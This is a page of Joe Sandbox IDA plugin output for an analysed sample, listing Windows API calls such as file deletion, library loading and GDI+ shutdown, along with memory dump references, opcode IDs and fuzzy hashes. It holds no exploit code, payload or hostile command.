                                        • Opcode Fuzzy Hash: eec59d21928926426082ddfb9f9f0c7b056be0b27087b766f635dc642d4541a8
                                        • Instruction Fuzzy Hash: A3F03032240149BBDF116F60DC45FEA37ECEB14785F448091B945D6161DBB1DA94EA50
                                        APIs
                                        • DeleteFileW.KERNELBASE(000000FF,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641,000000FF), ref: 00BBA1F1
                                          • Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27
                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641), ref: 00BBA21F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: DeleteFile$_wcslen
                                        • String ID:
                                        • API String ID: 2643169976-0
                                        • Opcode ID: 9955e40060505cc61ad795e6e0bd31c696cd15b601b224ce0b9407a75ced90b8
                                        • Instruction ID: a4dac86142e2c50d4f66d602f1d64089f3c02318c9685e150eb2dff3d9e4fa17
                                        • Opcode Fuzzy Hash: 9955e40060505cc61ad795e6e0bd31c696cd15b601b224ce0b9407a75ced90b8
                                        • Instruction Fuzzy Hash: DFE092315402096BEB019F60DC85FFA37DCEB08781F4840A1B945D7051EBA1DE84DA50
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00BE2641,000000FF), ref: 00BCACB0
                                        • CoUninitialize.COMBASE(?,?,?,?,00BE2641,000000FF), ref: 00BCACB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: 20492e0187cf1aa208a6b49029dfb9e3f20e70cb033ad2160021d792d289f040
                                        • Instruction ID: e718410c5defe5b6cdc6bdea00ec734a809e6c447f8db0ddd69b28202fc86364
                                        • Opcode Fuzzy Hash: 20492e0187cf1aa208a6b49029dfb9e3f20e70cb033ad2160021d792d289f040
                                        • Instruction Fuzzy Hash: 4BE03972604A90EFCA009B59DC46B59FBE8FB88A20F14436AA416937A0CB74A800CA90
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00BBA23A,?,00BB755C,?,?,?,?), ref: 00BBA254
                                          • Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BBA23A,?,00BB755C,?,?,?,?), ref: 00BBA280
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AttributesFile$_wcslen
                                        • String ID:
                                        • API String ID: 2673547680-0
                                        • Opcode ID: 6ccb513fd78a09a7d69e9b1dd5326ea1292d51a7dfb1d25c5e41667319938506
                                        • Instruction ID: 901b6043b247f138101a68f584ecc412cf2040faca3668fc2838c15dfbdd6b05
                                        • Opcode Fuzzy Hash: 6ccb513fd78a09a7d69e9b1dd5326ea1292d51a7dfb1d25c5e41667319938506
                                        • Instruction Fuzzy Hash: ACE09232900124ABCB60AB64CC49BE9B7D8EB087E1F0442A1FD55E71D1DBB0DE44CAA0
                                        APIs
                                        • _swprintf.LIBCMT ref: 00BCDEEC
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                        • SetDlgItemTextW.USER32(00000065,?), ref: 00BCDF03
                                          • Part of subcall function 00BCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
                                          • Part of subcall function 00BCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
                                          • Part of subcall function 00BCB568: IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
                                          • Part of subcall function 00BCB568: TranslateMessage.USER32(?), ref: 00BCB5AC
                                          • Part of subcall function 00BCB568: DispatchMessageW.USER32(?), ref: 00BCB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                        • String ID:
                                        • API String ID: 2718869927-0
                                        • Opcode ID: f5ba9306412b0b0502ea55f509fc00c8717bd040f7ac2dd7b2562895de5ce163
                                        • Instruction ID: d4b73445afd99de720500e8894f47c96d79c767cc9e8cb221d2fb2313d199226
                                        • Opcode Fuzzy Hash: f5ba9306412b0b0502ea55f509fc00c8717bd040f7ac2dd7b2562895de5ce163
                                        • Instruction Fuzzy Hash: FBE092B250024866DF02AB64DC06FEE3BECAB05785F440895B201DB1B3DA78EA108661
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1175261203-0
                                        • Opcode ID: 6be9553eb61880236cf53edd6aeb1aae2d563b170072e274070e8c01b6aec17f
                                        • Instruction ID: 81485f4d81a2050918b393f68054071a70ece709f1de5b2e5c78638f303aa6d3
                                        • Opcode Fuzzy Hash: 6be9553eb61880236cf53edd6aeb1aae2d563b170072e274070e8c01b6aec17f
                                        • Instruction Fuzzy Hash: CCE04876400158ABDB11A794DC49FDB77ECEF097D1F0400A57645D3005DAB4DA84CBB0
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BCA3DA
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BCA3E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: 69c5b35a37072138252d7f34c1addc8ca9a83f871a9bcd39058634c0fbc949a8
                                        • Instruction ID: 9fc4dd4f24aa0db2fe6229909a78a173a2895b3fa44f5288679dfc887d60e6b6
                                        • Opcode Fuzzy Hash: 69c5b35a37072138252d7f34c1addc8ca9a83f871a9bcd39058634c0fbc949a8
                                        • Instruction Fuzzy Hash: CCE0ED72500218EBCB10DF55C541BA9BBE8EB04365F10849EA85693201E374AE04DB91
                                        APIs
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD2BAA
                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BD2BB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                        • String ID:
                                        • API String ID: 1660781231-0
                                        • Opcode ID: a11153fd9101f30a6713944cbedacbdbd36032c1088321ff98307cae3e65508a
                                        • Instruction ID: 8c76113ada75a4bd31201548e48421309b05bb8935b2cc3106fd7527c7b3e0c6
                                        • Opcode Fuzzy Hash: a11153fd9101f30a6713944cbedacbdbd36032c1088321ff98307cae3e65508a
                                        • Instruction Fuzzy Hash: DFD0A938268380186D146B702A02898E7C6EDB2B70BA016EBE4208A7C2FED08080A026
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        • Opcode ID: 3e41faf8740b706a4852d0575dec4b2359916ca68193ff92717d14657274ff03
                                        • Instruction ID: 52bda81ee437e2582283083293472cfb3825cd0d4d8535b184281b419357cfef
                                        • Opcode Fuzzy Hash: 3e41faf8740b706a4852d0575dec4b2359916ca68193ff92717d14657274ff03
                                        • Instruction Fuzzy Hash: 96C012B265C280BECB010BB4DC09E6FBBA8BBA6316F24C908B0A5C0060C238C110DB11
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: c93bc14bb62e5b833056f34df5c9342455fac238d7a5e6300e870e5684170cd1
                                        • Instruction ID: 21c4326fec4dd8c5d170a5884494ef20d2a2cdf05973fa002f1fca12d720eb36
                                        • Opcode Fuzzy Hash: c93bc14bb62e5b833056f34df5c9342455fac238d7a5e6300e870e5684170cd1
                                        • Instruction Fuzzy Hash: 64C17C30A002549BEF25CF6CC4E8BF97BE5EF15310F5809F9EC459F296DAA09944CB61
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 01a5efe85d22f7b9313d91dd2dd54521c9ec73fe0b4a8d11f9becf17bb4f0afa
                                        • Instruction ID: 27c3b8c3013112f196515792b3116a7ef8dc0b5bc8ebf97164c3cc233a4e0d10
                                        • Opcode Fuzzy Hash: 01a5efe85d22f7b9313d91dd2dd54521c9ec73fe0b4a8d11f9becf17bb4f0afa
                                        • Instruction Fuzzy Hash: 0A71C371500B849FDB25DB74C895AF7B7E9EF14700F4009AEE1AB87241EA727A44DF21
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB8289
                                          • Part of subcall function 00BB13DC: __EH_prolog.LIBCMT ref: 00BB13E1
                                          • Part of subcall function 00BBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BBA598
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog$CloseFind
                                        • String ID:
                                        • API String ID: 2506663941-0
                                        • Opcode ID: bd4bc00094ad4645072c52ee542f96177d521e77116ec00147769f9a104f8c62
                                        • Instruction ID: 9e16c27daa84bae55a811c4d9f33f7349b840089c45fca8b681e9db128fa173a
                                        • Opcode Fuzzy Hash: bd4bc00094ad4645072c52ee542f96177d521e77116ec00147769f9a104f8c62
                                        • Instruction Fuzzy Hash: 304183719446589BDB20EB64CC55BFAB7ECEF00304F4404EAE18AA7193EBF55E89CB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB13E1
                                          • Part of subcall function 00BB5E37: __EH_prolog.LIBCMT ref: 00BB5E3C
                                          • Part of subcall function 00BBCE40: __EH_prolog.LIBCMT ref: 00BBCE45
                                          • Part of subcall function 00BBB505: __EH_prolog.LIBCMT ref: 00BBB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 8b6151ecdf5bf1b9d73030d0b5d09a308c018554c79c5fa6da691c40e517bf5f
                                        • Instruction ID: 0c0b62c495c5f4893c780503c4ba8c980ea9e239770df35448a6e48f268ef581
                                        • Opcode Fuzzy Hash: 8b6151ecdf5bf1b9d73030d0b5d09a308c018554c79c5fa6da691c40e517bf5f
                                        • Instruction Fuzzy Hash: 564148B0905B409EE724CF398895AE6FBE5FF28300F5049AED5FE83282CB716654CB10
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB13E1
                                          • Part of subcall function 00BB5E37: __EH_prolog.LIBCMT ref: 00BB5E3C
                                          • Part of subcall function 00BBCE40: __EH_prolog.LIBCMT ref: 00BBCE45
                                          • Part of subcall function 00BBB505: __EH_prolog.LIBCMT ref: 00BBB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 05ba5e0cd62e3041ff28da7afdba232143f75bb782a57dd1dfbb8aa94d11f3d1
                                        • Instruction ID: 74e2dda41ea380a78bda1753b5ccfb7c2f2bcbc5fa75d6b02a4ef1ae1b29ec6e
                                        • Opcode Fuzzy Hash: 05ba5e0cd62e3041ff28da7afdba232143f75bb782a57dd1dfbb8aa94d11f3d1
                                        • Instruction Fuzzy Hash: 1B4147B0905B409EE724DF798895AE6FBE5FF28300F5049AED5FE83282CB716654CB11
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BCB098
                                          • Part of subcall function 00BB13DC: __EH_prolog.LIBCMT ref: 00BB13E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: f548786fa9077a5312ec6b3043266e3fa2db44b4a38ef536918921f9185d87d5
                                        • Instruction ID: 2d155f26590b7a83723d279836a0d0be0d3f5b86b0abd7c14c28d101c30f31c5
                                        • Opcode Fuzzy Hash: f548786fa9077a5312ec6b3043266e3fa2db44b4a38ef536918921f9185d87d5
                                        • Instruction Fuzzy Hash: 45316C758102499BCF15DF68C861AFEB7F4AF09300F5444DEE409B7242D775AE04CB61
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00BDACF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        • Opcode ID: 8fa04fa1d374c16cdefb0a7a8c801b4be51b30f247d418c8a87e94c3eab35654
                                        • Instruction ID: 67135f03afa6213f43de97e19e449421c133bcb312cda54654a1869cfb459958
